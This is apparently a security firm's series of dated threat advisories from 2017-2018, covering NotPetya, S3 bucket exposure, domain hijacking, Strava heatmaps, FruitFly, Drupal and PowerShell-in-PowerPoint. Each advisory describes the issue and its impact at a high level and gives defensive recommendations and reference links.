Known adoption of Amazon S3: The risk level varies from low to critical, depending on individual bucket configuration for read/write access, granularity of defined accesses, types of content stored, and use cases for the stored content. The overall level of risk would be determined by these factors and will be different for each individual bucket within an organization’s cloud infrastructure.

No known adoption of Amazon S3: The current risk is undefined, and merits analysis to identify whether your organization is using S3, and if it is see above.

Recommendations


InGuardians recommends performing a self-assessment of existing S3 Buckets using currently available tools, such as AWSBucketDump and BuckHacker.  Results of these tools should then undergo a thorough inventory and risk analysis.

In addition to these open source tools, Amazon makes the AWS Trusted Advisor tool available to customers with a Business or Enterprise-level support plan. Trusted Advisor can analyze an AWS environment, including its S3 buckets, and make best practice recommendations.

Additional Resources

Tesla Cryptojacked by Currency Miners

https://nakedsecurity.sophos.com/2018/02/22/tesla-cryptojacked-by-currency-miners/

AWSBucketDump, an Open Source S3 Bucket Search Tool

https://github.com/jordanpotti/AWSBucketDump

BuckHacker, an S3 Search Engine
https://www.thebuckhacker.com/

AWS S3 Documentation: Which Access Control Method Should I Use?
https://docs.aws.amazon.com/AmazonS3/latest/dev/access-control-overview.html#so-which-one-should-i-use

AWS Trusted Advisor

https://aws.amazon.com/premiumsupport/trustedadvisor/

02/20/2018 Theft of Newtek domains is a reminder to stay vigilant

Issue

Last week a web services company (Newtek) responsible for hosting over 100,000 e-commerce based websites and email servers had three of its core domains stolen.  These domains originally hosted software that allowed customers of these services to manage their websites.

The attackers then replaced the application that users would normally use to manage their websites with his own application in the form of a live-chat service.  When users logged in, they believed themselves to be chatting with a helpful admin, when in fact they were communicating with the attacker.

Impact

The full impact of this is still being determined.  However, corporate email for many of their customers became unavailable, business websites no longer resolved, and sensitive information was most likely communicated to the attacker.

Recommendations

InGuardians recommends that all businesses consider domain hijacking as a potential event in their Business Continuity Plans (BCP).  It’s important to stay vigilant in ensuring continued ownership of domains. It’s also important to have plans to use secondary domains for web and email traffic in the event of having lost ownership of a domain.

InGuardians recommends building your own capabilities to gather counter-intelligence and to proactively monitor your organizations digital footprint.  Consider scripts or services for monitoring DNS changes to the domains that you control.

 

Wikipedia list these options as a means to prevent an unwanted domain transfer:

  • Use strong email passwords and enable two-factor authentication if available.
  • Disable POP if your email provider is able to use a different protocol.
  • Tick the setting “always use https” under email options.
  • Make sure to renew your domain registration in a timely manner – with timely payments and register them for at least five (5) years.
  • Use a domain-name registrar that offers enhanced transfer protection, i.e., “domain locking” and even consider paying for registry locking.



Additional Resources

https://krebsonsecurity.com/2018/02/domain-theft-strands-thousands-of-web-sites/
https://en.m.wikipedia.org/wiki/Domain_hijacking

02/12/2018 Smart devices add exposure and threat during a breach and are a source of intelligence and forensic data during incident response.

Issue
A common challenge in any incident response is figuring out how access was gained, which vulnerability or exploits were used, and how to prevent recurrence. Many breaches are not single events, but the end of a longer series of probes, penetrations, and exfiltrations. The reality is that we are often dealing not with “a breach,” but a series of incidents that can have been going on longer than many realize.

The explosion of smart devices creates many more opportunities not only to reveal information, but for attack vectors. A “phishing” email might be read on an employee’s cell phone and not directly breach a corporate system. But, it might install malware on that phone so the next time it is in WiFi or Bluetooth proximity of a business network the malware starts searching for new opportunities. This shifts what would have been an external penetration to an internal one.

Impact
The specific impact to InGuardians customers is relatively low.

The real challenge is in mapping the many additional connections to your networks, and identifying where such connections are logged – if at all. You cannot effectively investigate the cause or source of a breach if you do not have a clear record of the network.

Recommendations
InGuardians recommends regular review of network architecture as it develops, not merely as planned. Systems and connections often grow organically and in creeping increments, and too often expedient solutions are imperfectly documented. It is important to know what the network looks like today, to know where device access logs are stored, and whether they have ever been reviewed.  InGuardians highly recommends robust egress filtering and monitoring.

InGuardians also recommends reviewing the policy for the devices managed by your organization.  Secretary of Defense Mattis is reconsidering DoD’s policies for every personal electronic device that “transmits a two-way signal”.  That’s much more than just cell phones, but you should at least know WHAT you allow.

Additional Resources

http://www.nextgov.com/policy/2018/01/pentagon-reviewing-electronic-device-policy/145625/

02/05/2018 Strava heatmap exposes sensitive military bases invokes the law of unintended consequences.

Issue
Something as innocuous as a running application paired with cloud access and GPS location data allowed users to identify sensitive military and government bases and users.  The Guardian newspaper used a script to generate GPS data to upload to a Strava account.  Following this, they used the application to find other users that also do the same run.  The runs matched sensitive locations such as military installations and classified government facilities.  They identified 50 users by name.

With so many interconnecting devices, where is the boundary of your data.  If you don’t know where your data is, and where it goes, you cannot secure it.  With multiple devices providing cloud or syncing functionality, the ease at which data can unintentionally leak out of the environment is astounding.  

Impact
Impact from the Strava heatmap to InGuardians customers is relatively low.  The issue does present us with the conundrum of securing our data, performing operational security, and still being able to use that data and the many applications that have become intrinsic to our businesses.   

Recommendations
InGuardians primary recommendation is analyze the potential exfiltration threats that applications pose, and create policy to deal with these accordingly.  Some examples of applications and policies in this arena would be: social media use policy, onsite photography or mobile phone use, or modifying the meta data.

InGuardians also recommends implementing a Mobile Device Management (MDM) solution to enforce policy onto the devices managed by your organization.  Implementing steps in order to lock down functionality on these devices based on your internal processes and policies is critical.  Unknown, unmanaged devices should not be allowed on your network.  The larger concern goes beyond “Strava” and may include data that is gathered but not publicly mapped.

Additional Resources

Strava Heatmap and related articles

https://labs.strava.com/heatmap/#6.00/34.08716/29.07362/hot/all

https://www.washingtonpost.com/news/the-switch/wp/2018/01/31/lawmakers-demand-answers-about-strava-heat-map-revealing-military-sites/?utm_term=.7e78368ca5af

https://www.engadget.com/2018/02/02/strava-s-fitness-heatmaps-are-a-potential-catastrophe/

Metadata

https://support.office.com/en-us/article/Remove-hidden-data-and-personal-information-by-inspecting-documents-356b7b5d-77af-44fe-a07f-9aa4d085966f#ID0EAACAAA=PowerPoint

07/25/2017 Mac malware (FruitFly) that was detected and patched in January, still making rounds according to BlackHat presenter.

Issue
In January, malware that infects Mac OS X was detected impacting organizations performing research in the biomedical field.  This malware leveraged old functions that have been around in OS X for many years.  The main goal of the malware appears to be surveillance, given that it captures screenshots, accesses the webcam, and reportedly performs key logging.

Apple released a patch for this issue in January when the malware was first detected.  Many news outlets are incorrectly reporting that there is no known way to detect this malware.  However, most all major AV companies have signatures to detect FruitFly.

Impact
According to the BlackHat presenter, the recent infections appear to be mostly home users.  This is likely due to the fact that all properly licensed versions of OS X have been patched by Apple through a behind-the-scenes update mechanism, as of January.

The impact of this particular issue is low at the moment.
Recommendations

Even with a low impact, the detection of this malware is a reminder to practice good opsec (operational security) and keep built-in webcams covered unless in use.  Also, it is a reminder that even Apple systems can be vulnerable to malware.

InGuardians recommends that organizations ensure that all operating systems are licensed and up-to-date with all relevant security patches.  InGuardians also recommends that organizations endpoint security products to properly monitor all operating systems, including Apple products.

Additional Resources

07/17/2017 Kaspersky anti-virus removed from two GSA Schedules

Kaspersky Anti-Virus (AV) has been removed from two GSA (Government Services Administration) schedules, due to concerns that the Kremlin may use Kaspersky products to compromise US Government computers.

A commonly used anti-virus product has been banned for purchase by any U.S. Government agencies which use GSA schedules 67 and 70.  While the US government has not yet banned Kaspersky products already purchased, or those purchased outside the GSA schedule, the Senate version of the 2018 defense bill places a blanket ban on Kaspersky products.  This bill has not yet been passed.   Many government and private organizations receiving funding from the U.S. or state governments are required to make such purchases via the GSA schedule.

IMPACT

This ban limits further acquisition of Kaspersky AV by those organizations required to follow GSA.  However, many organizations may already have this product entrenched within their infrastructure.  Still, organizations which are not required to adhere to the GSA schedule may decide to follow suit with the GSA’s ban on Kaspersky AV.  Organizations may have many questions on how to move forward.

Recommendations

Tactical
Hold tight.  There is a significant amount of posturing and saber rattling on the geopolitical stage at the moment.  A number of independent research organizations are currently examining Kaspersky’s software, and reports should be forthcoming.
Strategic
InGuardians recommends that organizations not rely on solely one vendor’s solutions for security products.  Organizations should evaluate multiple providers and select only those with which they can form a trusted relationship. In the event that trusted relationship becomes compromised, the organizations should have plans for contingencies which enable the removal and selection of a new vendor without losing coverage.  Most of our clients favor endpoint protection, in addition to layered application and network defenses, over traditional anti-virus.

Additional Resources

http://thehill.com/policy/cybersecurity/341665-trump-admin-removes-russian-cyber-firm-from-approved-list

https://arstechnica.com/security/2017/07/kaspersky-denies-inappropriate-ties-with-russian-govt-after-bloomberg-story/

07/10/2017 DHS & FBI warn of attacks against US energy & manufacturing companies and employees

Issue
DHS and the FBI released a TLP:AMBER report warning US energy sector and manufacturing companies about ongoing cyber operations.  These operations include sophisticated physical and cyber attacks, as well as activities targeting employees and operators with the aim of infiltrating air-gapped networks.

Impact
Our customers in the energy sector have seen scanning and attacks increase in the last month, but one interesting twist about the report is the targeting of individual employees in order to infiltrate secure networks.  Many details regarding the attacks are now known to the public, in part because an irresponsible organization shared a TLP:AMBER report with the press.  The approach of going after operators and employees to target secure networks is reminiscent of how GHCQ hacked into Belgicom’s NOC.
This warning comes almost one month since Robert Lee and his team at Dragos released their research on the  CRASHOVERRIDE malware, along with ESET’s analysis of Industroyer. Keep in mind that Robert Lee will be presenting details on CRASHOVERRIDE at Black Hat in just a few weeks.

Recommendations
Your key operations and security staff should be trained in operational security (opsec). Include physical security tests and targeting specific roles and personnel as part of your routine security assessments.

Additional Resources

News regarding recent hacking of nuclear plant:

CRASHOVERRIDE:
Historical piece on GCHQ targeting Belgicom employees:
07/03/2017 Wiperware disguised as ransomware strikes globally, taking advantage of unpatched systems and flat networks.

Issue
The recent wave of supposed ransomware attacks, NotPetya, spread rapidly due to non-segmented (“flat”) networks after its initial infection. It is reported to have first hit the Ukraine and subsequently spread internationally. Many of the targets that reported infection are industrial, financial, health or other components of critical infrastructure.

Whereas the Petya ransomware that first emerged last year was actual ransomware, the variant that wormed its way through non-segmented (“flat”) networks in June 2017 (NotPetya) does not allow for decryption of the data.  As such, InGuardians classifies this as wiperware.

NotPetya uses many different vectors to infect and perform subsequent infections.  Even though it does use the NSA exploits EternalBlue and EternalRomance that were addressed by Microsoft security update MS17-010, NotPetya also leverages many other vectors of attack.  It includes mimikatz, with that tool’s LSADump module.  This is used for recovering passwords with the aim of gaining administrative access locally and eventually at the domain level. NotPetya also uses PSExec as a means of subsequent infection, as well as WMI calls.

Many people responsible for network security claim that they thought they were patched against the NSA exploits. It’s key to note that NotPetya has multiple initial infection vectors, including phishing. Even if one of the NSA exploits became the vector of initial infection on an unpatched machine, the other vectors of subsequent infection allow it to spread unhindered through flat networks, full of otherwise patched systems.

Impact
Infections of NotPetya spread rapidly across non-segmented, or “flat,” networks, stealing credentials and leveraging privileges and trust.  The technical result is mangled data on infected systems.  This data is unrecoverable.  The business impact has been a shutdown of operations in many of the impacted targets.

Recommendations
The one common issue that allows the spread of NotPetya is networks that are not segmented with access control.  Logically segmented networks are still considered flat networks, as they lack access controls.  When access controls restrict traffic from traversing network segments, hosts are well isolated and this stymies infections of this type, containing them to a single host or portion of the network.

InGuardians recommends implementing restrictive access controls at the network level and isolating hosts using host-based firewalls or Private VLANs. InGuardians also recommends using Group Policies within Microsoft Active Directory to lock down endpoints and implement the Principle of Least Privilege, preventing the lateral spread from affected, internal systems.  These tactics are highly recommended to defend against modern malware attacks like NotPetya.

Additional Resources
Setting up Private VLANs
http://packetlife.net/blog/2010/aug/30/basic-private-vlan-configuration/

http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3560/software/release/12-2_44_se/configuration/guide/scg/swpvlan.html

Implementing the Principle of Least Privilege within Various Versions of Windows

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models

https://technet.microsoft.com/en-us/library/bb456992.aspx

https://www.sans.org/reading-room/whitepapers/win2k/enforcing-least-privilege-principle-active-directory-ous-gpos-group-214

06/26/2017 Three Drupal updates patch critical vulnerabilities

Issue
One of the three critical vulnerabilities patched last week in the Drupal web content management system, allows for remote code execution.

Impact
Drupal is one of the most popular content management systems in use, and the vulnerability described in CVE-2017-6920 gives an attacker the same capabilities on the system as Drupal itself.
This vulnerability is in the PECL YAML parser, and is related to a bug found recently in PHP.  PHP updated their documentation alerting developers to not pass unsanitized user input to these functions, which did not “fix” the vulnerability.
Drupal updated their code, changing the way they pass input to the affected functions, and is no longer vulnerable to this attack vector.
YAML parsing vulnerabilities have led to quick widespread exploitation in the past, in multiple web frameworks and languages, and are thus considered quite dangerous.

Recommendations
Recent high profile website hack and defacements emphasize the need to check your content management system implementation and ensure it is up to date.

  • Tactical recommendation: If your organization has deployed Drupal, update to Drupal 8.3.4 or Drupal 7.56, as both branches include the fixes for these vulnerabilities.
  • Strategic recommendation: Consider using a static publishing script to separate your editing/publishing platform from your delivery system. This allows your team to reap the benefits of a content management system, and couples it with the security of a static site. WordPress, Drupal and other popular systems have static publishing plugins or scripts.
Additional Resources
Drupal update:
CVE Entries for the three Drupal vulnerabilities:
Example static publishing plugins:
06/19/2017 Nation states in the ransomware business

Issue

Nation states are now confirmed to be using ransomware campaigns to fund state coffers.   British National Cyber Security Center (NCSC) reported this week that the wannacry ransomware attack was launched from North Korea.  This follows the United States National Security Agency (NSA) assessment with the same conclusion.  Security experts believe that the attack was launched by the Lazurus Group tied to the government in Pyongyang.
Impact
This revelation further emphasizes the need for full backup, recovery and continuity plans to be tested and refreshed.  While most of our customers have a robust patching, backup and recovery processes in place, we see from news reports the impact wannacry had on critical production networks.  Many organizations have lost their data, or access to critical systems while being locked out during a ransomware attack.  E.G. British National Health Service systems were crippled during the wannacry attack
Recommendations

InGuardians recommends reviewing, testing and validating your patching, and backup/recovery processes.  Incident response capabilities should be tested as well, guided by an internal Red Team exercise designed to emulate the ransomware attack threat model.  InGuardians does not recommend paying for the return of your data.  See link below for new regulations that might impact the practice of paying your way out of ransomware.

Additional Resources

Articles related to this issue:

NIST Incident Response:

Bitcoin regulations to prevent infosec companies from helping organizations pay ransom:

06/12/2017 Powershell scripts execute in Powerpoint without macros

Issue

Microsoft’s powerful native scripting language, Powershell, is able to execute inside a Powerpoint presentation without using macros.  This presents an issue for many organizations that rely on blocking macros or documents with macros to minimize the risk of compromise via Microsoft Office documents.

Impact

InGuardians RedTeam operators used this very technique to compromise one of our toughest clients just last week.  This is a very real threat posing risk to the information security of your organization.  Determine which controls and audit measures best fit your security posture and move swiftly to lock down this threat vector.

Recommendations

InGuardians recommends first determining if systems need powershell.  If needed, ensure powershell is up to date.  Older versions of powershell do not have many of the security feature set that version 5 has. Take the necessary steps (outlined here:https://adsecurity.org/?p=2604) to detect powershell being used offensively on your systems.

Additional Resources

Excellent technical write-up on Powershell Security: https://adsecurity.org/?p=2921

Recent article on this threat: https://thehackernews.com/2017/06/microsoft-powerpoint-malware.html